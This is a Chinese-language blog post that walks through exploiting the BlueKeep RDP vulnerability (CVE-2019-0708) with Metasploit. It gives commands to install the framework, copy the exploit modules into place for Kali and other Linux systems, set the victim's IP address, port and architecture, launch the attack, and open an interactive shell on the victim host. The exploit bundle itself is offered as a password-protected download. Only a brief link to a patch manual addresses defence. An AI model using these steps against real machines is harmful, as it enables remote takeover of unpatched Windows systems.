[技术]MSF利用CVE-2019-0708工具EXP (0708解决报错)

释放双眼,带上耳机,听听看~!

CVE-2019-0708这个漏洞最早在今年5月份被曝光。

博主一早睡醒,看看朋友圈,发现被刷屏了,全都是CVE-2019-0708EXP的事情。我也无意再睡了,起床分享给大家。

据我目前了解到最新消息:

也就是说目前的EXP还不稳定,一不小心就会蓝屏,大家在做测试的时候小心点。目前EXP版本仅对windows 7 和 8有用。

GitHub上的EXP  

附上最新MSF功能公告:MetaSploit新功能Pingback Payloads

 https://github.com/rapid7/metasploit-framework/pull/12283

CVE-2019-0708RDP MSF攻击套件

CVE-2019-0708RDP MSF攻击套件.zip   (密码联系博主)

MSF会报错

[+] 10.120.1.185:3389 – The target is vulnerable.
[-] 10.120.1.185:3389 – Exploit failed: NameError undefined local variable or method `rdp_connect’ for #Msf::Modules::Exploit__Windows__Rdp__Cve_2019_0708_bluekeep_rce::MetasploitModule:0x00007f19f2118650
Did you mean? disconnect
[
] Exploit completed, but no session was created.

如图


按照下面步骤可解决报错

Linux安装MSF(metasploitframework-latest)

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb 
msfinstall && chmod 755 msfinstall && ./msfinstall

拷贝CVE-2019-0708攻击模块

其他Linux独立安装msf环境

root@HackLiu:#cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
root@HackLiu:#cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
root@HackLiu:#cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
root@HackLiu:#cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Kali系统部署msf环境

root@HackLiu:#cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
root@HackLiu:#cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
root@HackLiu:#cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
root@HackLiu:#cp cve_2019_0708_bluekeep_rce.rb usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

加载CVE-2019-0708攻击模块

使用msfconsole进入metasploit-framework
进入以后使用reload_all重新加载0708rdp利用模块

使用CVE-2019-0708模块攻击

使用msfconsole进入metasploit-framework
使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP攻击模块
使用info查看工具相关信息以及设置
可见关键设置主要为RHOSTS\ RPORT \ target
使用set RHOSTS 受害机IP设置受害机IP
使用set RPORT 受害机PORT设置受害机RDP端口号
使用set target ID数字(可选为0-4)设置受害机机器架构这里我们使用的是VMware Fusion,那么target 3满足条件
使用exploit开始攻击,等待建立连接
建立连接以后,使用shell获得shell,再使用python获得交互式shell
随即完成攻击,成功拿到受害者主机权限

CVE-2019-0708攻击视频


CVE-2019-0708漏洞修复

CVE-2019-0708漏洞补丁工具使用手册.docx

人已赞赏
安全工具

[技术]metasploit-framework安装后报告HOME environment variable 解决方法

2020-2-2 2:31:21

安全工具安全建设

[技术]Tomcat远程代码执行漏洞(CVE-2016-8735)

2020-2-2 2:31:56

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索